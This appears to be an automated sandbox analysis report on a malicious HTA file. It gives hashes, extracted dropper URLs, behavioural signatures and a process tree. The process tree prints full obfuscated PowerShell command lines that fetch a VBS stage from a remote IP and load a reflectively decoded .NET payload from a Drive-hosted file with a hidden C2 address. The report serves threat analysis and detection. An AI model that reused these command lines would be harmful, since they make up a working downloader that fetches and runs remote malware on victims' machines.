Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    30-10-2024 09:14

General

  • Target

    creatednewthingsformee.hta

  • Size

    205KB

  • MD5

    0b94188f0fe1baed9f97e0a69806b6e9

  • SHA1

    65a871c11c36799a747b8b40154130415f6e6f84

  • SHA256

    5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f

  • SHA512

    ad87371d82d5887377cc5882111f26849c6783427bf15c2fe235ca7570898d8937032e445e377acfe6d495ba01a0cad558fd0a3ecb23152b177ef5708639b75a

  • SSDEEP

    96:43F975adf4WbLdfSWbmx0JnfXdfmdfvUWbEdfAQ:43F15Of4GRfSGmx0J1fqfvUGAfAQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatednewthingsformee.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
      "C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'JEhReHJKU2ZXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUkRFRkluaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl2Q2FjT3NiUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVEN2dHJKVElJcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHdUc0dkTE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXdMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAib1V1WXR5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpRFFLc1Z2b0pUUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSFF4ckpTZlc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82NS9zZWV0aGViZXN0aHRpbmdzd2l0aG1ld2hpY2hnaXZlZ3JlYXRvdXRwdXRvZm1lZ29vZC50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyIsMCwwKTtTdGFSdC1TbGVFcCgzKTtzdEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyI='+[cHar]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2420
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2776
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xbwjezt_.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78D9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC78D8.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2616
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1508
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRTaEVMTElkWzFdKyRzaGVsTElkWzEzXSsneCcpICgoJ1M3RmltYWdlJysnVXJsID0gYkJIaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgYkJIO1M3RndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbicrJ3Q7UzdGaW1hZ2VCeXRlcyA9IFM3RndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoUzdGaW1hJysnZ2VVcmwpO1M3RmltYWdlVGV4dCA9JysnIFtTeXN0ZW0uVGUnKyd4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKFM3RmltYWdlQnl0ZXMpO1M3RnN0YXJ0RmxhZyA9IGJCSDw8JysnQkFTRTY0XycrJ1NUQVJUPj5iQkg7UzdGZW5kRmxhZyA9IGInKydCSDw8QkFTRTY0X0VORD4+YkJIO1M3RnN0YXJ0SW5kZXggPSBTN0ZpbWFnZVRleHQuSW5kZXhPZihTN0ZzdGFydEZsYWcpO1M3RmVuZEluZGV4JysnID0gUzdGaW1hZ2VUZXh0LkluZGV4T2YoUzdGZW5kRmxhJysnZyk7UzdGc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIFM3RmVuZEluZGV4IC1ndCBTN0ZzdCcrJ2FydEluZGV4O1M3RnN0YXJ0SW5kZXggKz0gUzdGJysnc3RhcnRGbGFnLkxlbmcnKyd0aDtTN0ZiYScrJ3NlNjRMZW5ndGggPSBTN0ZlbmRJbmRleCAtIFM3RnN0YXInKyd0SW5kZXg7UzdGYmFzZTY0Q29tbWFuZCA9IFM3RmltYWdlVGV4dC5TdWJzdHJpbmcoUzdGc3RhcnRJbmRleCwgUzdGYmFzZTY0TCcrJ2VuZ3RoKTsnKydTN0ZiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luICcrJyhTN0ZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgQkRGIEZvckVhY2gtT2JqZWN0IHsgUzdGXyB9KVsnKyctJysnMS4nKycuLShTN0ZiYXNlNjRDb21tYW5kLkxlbmd0aCldO1M3RmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoUzdGYicrJ2FzZTY0UmV2ZXJzZWQpO1M3RmxvYWRlZEFzJysnc2VtJysnYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChTN0Zjb21tYScrJ25kJysnQnl0JysnZXMpO1M3RnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QoYkJIVkFJJysnYkJIKTtTN0Z2YWlNZXRob2QuSW52b2tlKFM3Rm51JysnbGwsIEAoYkJIdHh0LktMTExQTVMvNTYvMTUxLjg3MS42NC44OTEvLzpwdHRoYkJILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhkZXNhdGl2YWRvYkInKydILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhhc3BuZXRfcmVnYnJvd3NlcnNiQkgsIGJCSGRlc2F0aXZhZG9iQkgsIGJCSGRlc2F0aXZhZG9iQkgsYkJIZGVzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvJysnYkJILGJCSGRlc2F0aXZhZG8nKydiQkgsYkJIZGUnKydzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvYkJILGJCSDFiQkgsYkJIZGVzYXRpdmFkb2JCSCkpOycpLlJlUGxhY0UoJ0JERicsJ3wnKS5SZVBsYWNFKCdiQkgnLFtzdFJpbmddW2NoYXJdMzkpLlJlUGxhY0UoJ1M3RicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:636
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2116

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES78D9.tmp

    Filesize

    1KB

    MD5

    82072ae26dd9f949d65b96584b84cbf1

    SHA1

    bc2840aa2cae5b278c7ae944a662876923c5b4e4

    SHA256

    69d998a7c423b040969353510130797735d1d4240a46619364fbc2aad9d9dcfc

    SHA512

    7c3757689dfe7002edf4aa2a8e65571644e47f62643c6c07dbb069a01f8087e3c467a32799e0362e6955cdf8a10f64e59e707b638db5bc09105199033865d3d3

  • C:\Users\Admin\AppData\Local\Temp\xbwjezt_.dll

    Filesize

    3KB

    MD5

    79711cb5c7028942a64f114ba18a8b9c

    SHA1

    f4f7e118b2642f162477842c924f0201cf28ed53

    SHA256

    cd9c213f7698dc7ae933afe13f363dcff4616f084f9250eaeea51c66c4e312d6

    SHA512

    af0f2cef38818d4889804cd027b2096e5035fbb6fabc35c16b1b966ba7133eb16063050e351c171691331120192748506212097d9c107e071216566e61119829

  • C:\Users\Admin\AppData\Local\Temp\xbwjezt_.pdb

    Filesize

    7KB

    MD5

    471e9cd1cfc63055c6560e41b96cfdfe

    SHA1

    d4882af938750ff00f09c29748d18c3807595524

    SHA256

    7b5fa55e610518bf7d124a09473dcdf4e3b92ee27bd9a0be573b50960dc1b055

    SHA512

    7c871fe14adbeb6e577bd42d1ca1d9d51fd4cb35aae2951bf582bd322f106a1772e7b6e75280537da877623459b5dc55b6f049c2921470e606421641bb232433

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0c31bd8848dc7258cff38518f4cae5ee

    SHA1

    747f2f0f323442e80ea0bce112086533104bb919

    SHA256

    a5805fbd8dadfafbec6a2201a6397ac1c82200758fd9a2119fac72753b15df2a

    SHA512

    b18636d1a35e2e2ee6648aef358ee3ab01536ad9f788486b35a848a2bfaa60b3c93bf8566939d4b0870c20dc2c36496467eced9b495bf742cc96004a4e9c25f0

  • C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS

    Filesize

    137KB

    MD5

    4dd3d6eed0e1ade77fde299848078ef8

    SHA1

    75855bee75c0c52d00cad1897c381ffc6c706200

    SHA256

    9bff58b3dfe1955e923ed90e899ac419667de9e6c842753d68614fbf8f612305

    SHA512

    3c7907b390cedb7f619f1cb9d3aaa24c623a6083995be4a45690e5fd05982df6054e33d1d434cbcb725ad27003529112abb52138d4f5125bfc8680a786701e5d

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC78D8.tmp

    Filesize

    652B

    MD5

    903d43728e2e08967373a527349d91e8

    SHA1

    82dc2681509dde15cfd0d9826567ce4376b8532a

    SHA256

    8f209e57484c9009fafe91adfc147b6a2473d1683f36d071bcbcffe7c6347fba

    SHA512

    b471bfcef5c444288a9b9f72c52ffbdb419b240cfb5311e36da72d5e9d991bfd89d5406bb0cc8c0afdcd3bd4efa6696252f3c95cf224c1a8ecca598c31e530c1

  • \??\c:\Users\Admin\AppData\Local\Temp\xbwjezt_.0.cs

    Filesize

    487B

    MD5

    9b8f2dee116254910197a8801c205862

    SHA1

    c4fddb1f937921b75c5c988cdb3f459faa446d52

    SHA256

    5dc90823fdcadfdd6112440b46638cf1ab71285482a67d35e2bf187f68d39ee3

    SHA512

    00e292822b1e9e94fdf9d91a3edd5cc30f09b02bc6413dde3bb8d1941534637cb0832544f984ed65944e30e473a6820e6816841261efef0f519dab6a14ebf218

  • \??\c:\Users\Admin\AppData\Local\Temp\xbwjezt_.cmdline

    Filesize

    309B

    MD5

    c2e97d018eb7c0668c91761acd2d7aec

    SHA1

    f33c1ab5addacbb1348d5a0c43e196c9f3f5272a

    SHA256

    71808e7986efa2bfbe48d5526778c4a66ae86d26a4e991b0e45aa733257738f2

    SHA512

    b512feed05b019598d0449e75f3f0bfea373c77afd93812c26bbcb4b378d03902e06d9ef879d1260a0dcbd9eb2884d45b1636db9298162b48153646d1eaea1c0